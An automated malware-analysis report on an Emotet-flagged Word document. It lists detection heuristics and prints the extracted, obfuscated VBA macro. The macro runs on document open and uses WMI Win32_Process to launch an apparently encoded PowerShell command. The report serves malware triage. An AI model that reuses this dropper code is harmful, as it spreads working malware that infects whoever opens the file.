Verdict: MALICIOUS
Risk score: 232

Heuristics (7)

- ClamAV: Doc.Dropper.Emotet-7572661-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Emotet-7572661-0
- VBA project inside OOXML (medium, OOXML_VBA; 3 related findings): Document contains a VBA project, i.e. VBA macros are present
- GetObject call (high, OLE_VBA_GETOBJ): matched line in script: `Set Hgfvzjsefnnn = GetObject(Quaaasngkwx)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every extracted URL on this report carried the label "In document text (OOXML body / shared strings)".
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8692 bytes | f576441decd9c5abba082cf895d8072fa89005c5c54232d594e1e36d2c480702 |

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 105 of 177 identifiers look randomly generated (e.g. 'Zdyaifmhxkjji'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Eupvgyresx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
pl34 _
= "{TipTopPo}"
j3u = Edmotpdqfkjxh + Auacaaomtv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mdmadoavics + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qsioczduna)
ndko24 = "{TipTopPo}"
nsih6 = 239 + 893 + 636
akj3 = 868 + 756
kqkqn4 = (Ivxqrtswzq) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgjgidybdsji
Mplapgma.Pqsdmifqouiss
End Sub
Attribute VB_Name = "Yuqmslzswwycl"
Attribute VB_Base = "0{579E53AB-BE00-459F-8F0D-F494EBF40C6B}{34353EDD-D899-46E5-B121-745F0A40376F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mplapgma"
Function Pqsdmifqouiss()
pl34 _
= "{TipTopPo}"
j3u = Bjofvbhxhhko + Kxebzguhiid
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Poivfccvwpsk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zedoebhbhyg)
ndko24 = "{TipTopPo}"
nsih6 = 807 + 124 + 223
akj3 = 793 + 964
kqkqn4 = (Xuafbvisi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Eleuoilqrs
Qssxvhhq = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Yuqmslzswwycl.Vaumcniw + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
pl34 _
= "{TipTopPo}"
j3u = Zwuzcutxi + Kpaghoeojudaf
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gekzvdqwy + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Dquwwzdaifakg)
ndko24 = "{TipTopPo}"
nsih6 = 508 + 944 + 171
akj3 = 872 + 190
kqkqn4 = (Kjkwwpuwoo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gsutbpilou
Quaaasngkwx = Varxdtkcwm(Qssxvhhq)
pl34 _
= "{TipTopPo}"
j3u = Brxdamqi + Dljucipzxqwq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Lzpgiixekkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gunvpxsw)
ndko24 = "{TipTopPo}"
nsih6 = 698 + 358 + 246
akj3 = 348 + 180
kqkqn4 = (Nywjbdagkzi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Xjzrxzbz
Set Hgfvzjsefnnn = GetObject(Quaaasngkwx)
pl34 _
= "{TipTopPo}"
j3u = Tzxxvzdfma + Cxwqcnkqtc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzyjcjxbmb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ismsttnhmvyt)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 875 + 999
akj3 = 584 + 338
kqkqn4 = (Yizntrjm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Btdcdsxaochjb
Qvxgssfdwu = Yuqmslzswwycl.Igcttfmk.Tag
pl34 _
= "{TipTopPo}"
j3u = Yfknkqvg + Xwhnszpxtg
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cefaxqhmxjnb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nmvhmongtodmc)
ndko24 = "{TipTopPo}"
nsih6 = 251 + 170 + 847
akj3 = 436 + 660
kqkqn4 = (Pbkihdghktey) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nifoulcclt
Hunodmcel = Quaaasngkwx + ChrW(Int(wdKeyS)) + Yuqmslzswwycl.Kcayeyzlzbvf.Tag + Qvxgssfdwu
pl34 _
= "{TipTopPo}"
j3u = Bhevvreldf + Owjhskmqv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Rhtstnmlgin + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zdyaifmhxkjji)
ndko24 = "{TipTopPo}"
nsih6 = 196 + 747 + 874
akj3 = 414 + 347
kqkqn4 = (Fmlqtunnbzkx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ixaljiolliqv
Zwndiejpwjmo = Hunodmcel + Yuqmslzswwycl.Vaumcniw
pl34 _
= "{TipTopPo}"
j3u = Qhofmcqavggcn + Kamhfpcwxjsnc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Bgusarqf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Eafgyzhkitogj)
ndko24 = "{TipTopPo}"
nsih6 = 856 + 603 + 957
akj3 = 372 + 425
kqkqn4 = (Olrvtporsf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ueitvzjbo
Set Rcyklzqzxbej = Figrtjza(Zwndiejpwjmo)
pl34 _
= "{TipTopPo}"
j3u = Stkqamivh + Xtnpxdoyywegx
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Koqugakcpdzgw + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Wnsfqdrq)
ndko24 = "{TipTopPo}"
nsih6 = 705 + 697 + 790
akj3 = 715 + 931
kqkqn4 = (Qqkknnmicctfn) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nrymyxsdxarn
Call Hgfvzjsefnnn. _
Create(NJ + Syopamaqcfbxq, Knufjdzrhwbo, Rcyklzqzxbej, Joaexpbogj, Dczbylbjgaqbu, Fldwzlfet)
pl34 _
= "{TipTopPo}"
j3u = Zkbeuepz + Hsrndejhxly
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mtusvqia + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gmxkwpfiq)
ndko24 = "{TipTopPo}"
nsih6 = 346 + 659 + 426
akj3 = 442 + 428
kqkqn4 = (Azkmxsqyv) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Djpkzltj
End Function
Function Figrtjza(Yuceucmd)
pl34 _
= "{TipTopPo}"
j3u = Otwuzfjs + Yceejsoh
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Dkpkdtlvwk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Fbktetgsx)
ndko24 = "{TipTopPo}"
nsih6 = 343 + 432 + 657
akj3 = 889 + 102
kqkqn4 = (Dblrtzrs) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Mweemrgtnv
Set Figrtjza = GetObject(Yuceucmd)
pl34 _
= "{TipTopPo}"
j3u = Xpcvxrgbep + Ljhfqiyafyd
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ifqwivledcg + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qkfoojuwg)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 557 + 780
akj3 = 651 + 400
kqkqn4 = (Ooqtsfymhfpm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Wtymigbql
Figrtjza. _
showwindow = Mftvhljlzx + Ypmpgjyzk
pl34 _
= "{TipTopPo}"
j3u = Oufvobajd + Nhsmaogivbc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Ecobpmyuxyyte + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zpeknvauyw)
ndko24 = "{TipTopPo}"
nsih6 = 909 + 672 + 703
akj3 = 75 + 127
kqkqn4 = (Bgvgmnirm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Uqltpittwuujg
End Function
Function Varxdtkcwm(Pqlgdwln)
pl34 _
= "{TipTopPo}"
j3u = Uxfgwhlullxpa + Dkgxhvxnbdt
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Kqgcqnotejq + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Beyqhxmi)
ndko24 = "{TipTopPo}"
nsih6 = 763 + 733 + 583
akj3 = 398 + 854
kqkqn4 = (Kqsdwjecc) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jufvyntvzapid
Varxdtkcwm = Join$(Split(Pqlgdwln, "/34//22/778//0//3/"), NoLineBreakAfter)
pl34 _
= "{TipTopPo}"
j3u = Amnslqhuyfst + Zlhgrdnv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Talvklegferz + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ssrsrzhof)
ndko24 = "{TipTopPo}"
nsih6 = 964 + 944 + 552
akj3 = 955 + 436
kqkqn4 = (Mdeqdeequ) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Emjnamnniz
End Function
Function Syopamaqcfbxq()
pl34 _
= "{TipTopPo}"
j3u = Gqjgmyzwqol + Zdpybyjbwzob
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Eyupapqfmbs + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nstbgboytjz)
ndko24 = "{TipTopPo}"
nsih6 = 921 + 315 + 988
akj3 = 395 + 596
kqkqn4 = (Xojquenkv) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Zlrbtrngehvjc
Tzaaekktrsey = ChrW(Int(wdKeyP))
pl34 _
= "{TipTopPo}"
j3u = Wxobwzpfkat + Rjdhulkmo
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Hshekcebc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Shofvsbb)
ndko24 = "{TipTopPo}"
nsih6 = 78 + 602 + 653
akj3 = 838 + 746
kqkqn4 = (Zyobjzlepci) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Uerkvhwrw
Jiwzykczz = Tzaaekktrsey + Yuqmslzswwycl.Rkalqggkpr.ControlTipText + " -e "
pl34 _
= "{TipTopPo}"
j3u = Hdtvcjrhjem + Iwhndoih
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Usxxlqwfkub + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Kbsjvpnccwv)
ndko24 = "{TipTopPo}"
nsih6 = 474 + 412 + 192
akj3 = 502 + 723
kqkqn4 = (Acclciaqzce) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Qmzbrblhw
sser = Yuqmslzswwycl.Xtvuusmhxrqzi.Pages(0).Caption
pl34 _
= "{TipTopPo}"
j3u = Knhyhgxflvyt + Zrvnysptpopo
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Wexniumtrv + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Skxyusap)
ndko24 = "{TipTopPo}"
nsih6 = 68 + 941 + 12
akj3 = 205 + 863
kqkqn4 = (Idvkcrysjt) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Jgxkkiifzz
Syopamaqcfbxq = Varxdtkcwm(Jiwzykczz + StrReverse(sser))
pl34 _
= "{TipTopPo}"
j3u = Vctdkvsdptoq + Jjnxwmwxumvan
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Hzzurtsvcq + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Rzblxmcdxzhjk)
ndko24 = "{TipTopPo}"
nsih6 = 712 + 563 + 325
akj3 = 709 + 637
kqkqn4 = (Hhhkiwrhtowxd) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgemfxsaynk
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 56832 bytes | a95c60b9f1b12ce0318b49db6f0149dba894f256011dde34f464c69e9153d383 |

Detection
- ClamAV: Doc.Dropper.Emotet-7572661-0
- Obfuscation or payload: likely. 389 of 708 identifiers look randomly generated (e.g. '_B_var_ZvvtbywxrexmyNxlqqzwqthbebD'), consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).